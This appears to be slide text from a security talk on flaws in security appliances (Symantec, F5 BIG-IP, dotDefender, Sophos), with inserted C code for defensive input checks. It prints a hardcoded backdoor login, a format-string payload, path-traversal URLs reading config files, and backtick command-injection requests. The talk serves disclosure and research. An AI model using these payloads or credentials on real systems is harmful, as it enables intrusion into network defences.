3. Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
4. The question
Do you know anybody less boring?
What if the security software (SS) itself is vulnerable?
6. The answer
• Symantec Messaging Gateway
– Backdoor by design
Code execution
• F5 BIG-IP
– SQL Injection, XXE
Passwords… Root access
• Applicure dotDefender WAF
– Format string vulnerability
Code execution
• Sophos Web Protection Appliance
– LFI, OS Command Injection
Command execution, admin account pwn
Security software products are the target of the trade ... already!
7. The answer
Symantec Messaging Gateway v.9.5.x
“... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...”
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
9. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...”
12. The answer
F5 BIG-IP <= 11.2.0
sam/admin/reports/php/getSettings.php
13. The answer
AppliCure dotDefender WAF <= 4.26
“... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...”
Web Attack?
14. The answer
AppliCure dotDefender WAF <= 4.26
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
• %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Looks nice…
15. The answer
AppliCure dotDefender WAF <= 4.26
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
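The dotDefender slides above describe administrator-configurable error-page variables (%IP%, %RID%, ...) ending up in a printf-style sink (AP_PRINTF). The following is an added example, not code from the talk or from AppliCure, that puts the vulnerable shape next to a hardened one: the hardened expander substitutes the placeholders by plain copying and never hands the result to a format function, and a separate check flags templates that still carry printf conversion directives so a custom page can be rejected or logged before it is rendered. The placeholder names are the ones on the slide; the function names and the sample values are my own.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Placeholder names taken from the dotDefender custom error page slide. */
struct page_vars {
    const char *mailto;     /* %MAILTO_BLOCK% */
    const char *rid;        /* %RID%          */
    const char *ip;         /* %IP%           */
    const char *date_time;  /* %DATE_TIME%    */
};

static const char *PLACEHOLDERS[4] = { "%MAILTO_BLOCK%", "%RID%", "%IP%", "%DATE_TIME%" };

/* Vulnerable shape (illustration only, never call it with a user-controlled
 * template): the expanded page is used as the *format argument* of a
 * printf-like function, so any %d/%s/%n left in the template is interpreted. */
void render_unsafe(const char *expanded_page, char *out, size_t outlen)
{
    snprintf(out, outlen, expanded_page);   /* format string under attacker control */
}

/* Append n bytes of src to out without interpreting them.
 * Returns the new write position, or -1 if out would overflow. */
static ptrdiff_t append_literal(char *out, size_t outlen, ptrdiff_t pos,
                                const char *src, size_t n)
{
    if (pos < 0 || (size_t)pos + n + 1 > outlen)
        return -1;
    memcpy(out + pos, src, n);
    out[pos + n] = '\0';
    return pos + (ptrdiff_t)n;
}

/* Hardened expander: copies the template byte for byte and replaces the four
 * known placeholders by their values. The output is data, not a format
 * string; the caller writes it with fputs()/write(), never printf().
 * Returns the output length, or -1 on overflow. */
ptrdiff_t expand_template(const char *tpl, const struct page_vars *v,
                          char *out, size_t outlen)
{
    const char *values[4] = { v->mailto, v->rid, v->ip, v->date_time };
    ptrdiff_t pos = 0;
    size_t i = 0, n = strlen(tpl);

    out[0] = '\0';
    while (i < n && pos >= 0) {
        int matched = 0;
        if (tpl[i] == '%') {
            for (size_t k = 0; k < 4; k++) {
                size_t nl = strlen(PLACEHOLDERS[k]);
                if (strncmp(tpl + i, PLACEHOLDERS[k], nl) == 0) {
                    const char *val = values[k] ? values[k] : "";
                    pos = append_literal(out, outlen, pos, val, strlen(val));
                    i += nl;
                    matched = 1;
                    break;
                }
            }
        }
        if (!matched) {                 /* unknown '%...' stays a literal byte */
            pos = append_literal(out, outlen, pos, tpl + i, 1);
            i++;
        }
    }
    return pos;
}

/* Returns 1 if the template contains a '%' that is neither one of the four
 * placeholders nor the literal escape "%%", i.e. something a printf family
 * function would treat as a conversion directive (e.g. the %666d payload). */
int template_has_format_directive(const char *tpl)
{
    for (size_t i = 0; tpl[i]; i++) {
        if (tpl[i] != '%')
            continue;
        if (tpl[i + 1] == '%') { i++; continue; }
        int known = 0;
        for (size_t k = 0; k < 4; k++) {
            size_t nl = strlen(PLACEHOLDERS[k]);
            if (strncmp(tpl + i, PLACEHOLDERS[k], nl) == 0) { known = 1; i += nl - 1; break; }
        }
        if (!known)
            return 1;
    }
    return 0;
}
```

The design point is that substitution and output are separated: once the placeholders are expanded by copying, nothing downstream may treat the buffer as a format string, and the directive check gives the administrator-facing UI a way to refuse a page that would have triggered the sink.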
17. The answer
Sophos Web Protection Appliance <= 3.7.8.1
“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...”
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
Passwords!
18. The answer
Sophos Web Protection Appliance <= 3.7.8.1
Diagnostic Tools
POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60
20. The answer
Sophos Web Protection Appliance <= 3.7.8.1
Local Site List
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
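The patience.cgi traversal on slide 17 (a `..` path ending in %00) and the diagnostic_tools and local_site_list injections on slides 18 and 20 (backtick substitution inside a url or entries value) come down to the same thing: a CGI handler trusting a decoded parameter. The following is an added example, not code from the talk or from Sophos, of the checks a defender would put in front of such handlers: percent-decoding that reports an embedded NUL instead of letting strlen() silently truncate the path, a path check that rejects absolute paths and `..` segments before the name is joined to a base directory, and a URL check for a wget-style action that rejects shell metacharacters and keeps the argument as a single argv element so no shell is involved. Function names, the base directory and the sample file name are my own assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

/* Percent-decode a query parameter. Returns the number of decoded bytes
 * (which may include '\0'), or -1 on a malformed escape or overflow.
 * Callers compare the returned length with strlen(out): a mismatch means
 * an embedded NUL such as the %00 on the slides. */
long url_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; in[i]; i++) {
        if (o + 1 >= outlen) return -1;
        if (in[i] == '%') {
            if (!isxdigit((unsigned char)in[i + 1]) || !isxdigit((unsigned char)in[i + 2]))
                return -1;
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else if (in[i] == '+') {
            out[o++] = ' ';
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return (long)o;
}

/* Accept a relative file name for a handler like patience.cgi?id=...:
 * no embedded NUL, no absolute path, no "." or ".." segment, no empty segment. */
int path_param_is_safe(const char *decoded, long decoded_len)
{
    if (decoded_len < 1 || (size_t)decoded_len != strlen(decoded))
        return 0;                                   /* %00 truncation attempt */
    if (decoded[0] == '/')
        return 0;
    const char *p = decoded;
    while (*p) {
        const char *seg_end = strchr(p, '/');
        size_t seg_len = seg_end ? (size_t)(seg_end - p) : strlen(p);
        if (seg_len == 0) return 0;                                 /* "//" */
        if (seg_len == 1 && p[0] == '.') return 0;
        if (seg_len == 2 && p[0] == '.' && p[1] == '.') return 0;   /* traversal */
        if (!seg_end) break;
        p = seg_end + 1;
    }
    return 1;
}

/* Join base and the checked name; returns 0 if the check fails or on overflow. */
int build_safe_path(const char *base, const char *decoded, long len,
                    char *out, size_t outlen)
{
    if (!path_param_is_safe(decoded, len)) return 0;
    int n = snprintf(out, outlen, "%s/%s", base, decoded);
    return n > 0 && (size_t)n < outlen;
}

/* Accept a URL for an action like action=wget&url=...: http(s) scheme, printable
 * ASCII only, and none of the characters a shell would interpret. Even with this
 * check the URL must be passed as one argv element (execve), never to system(). */
int url_param_is_safe(const char *decoded, long decoded_len)
{
    static const char meta[] = "`$;|&<>(){}\\\"' \t\r\n";
    if (decoded_len < 1 || (size_t)decoded_len != strlen(decoded))
        return 0;
    if (strncmp(decoded, "http://", 7) != 0 && strncmp(decoded, "https://", 8) != 0)
        return 0;
    for (const char *p = decoded; *p; p++) {
        if ((unsigned char)*p < 0x20 || (unsigned char)*p > 0x7e) return 0;
        if (strchr(meta, *p)) return 0;
    }
    return 1;
}

/* argv for the wget action: each element reaches execve as-is, so a backtick
 * in url could at worst be a bad URL, never a command. Returns 0 if rejected. */
int build_wget_argv(const char *decoded_url, long len, const char *argv[4])
{
    if (!url_param_is_safe(decoded_url, len)) return 0;
    argv[0] = "wget"; argv[1] = "--"; argv[2] = decoded_url; argv[3] = NULL;
    return 1;
}
```

The length-versus-strlen comparison in url_decode is the piece most often missing: a handler that decodes into a C string and then opens it sees the path end at the NUL, which is exactly what the %00 suffix on the slide relies on.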
23. Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
24. Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
– Application testing and fuzzing
– Reverse engineering
– Source code analysis
• A short note on so-called “security scanning” tools
25. Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
27. Vuln, where art thou?
*Move two matches to make it three equal squares
29. Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
30. And now for something completely different
Sometimes it’s easier to find the vulnerability than might be expected . . .
*doesn’t exist yet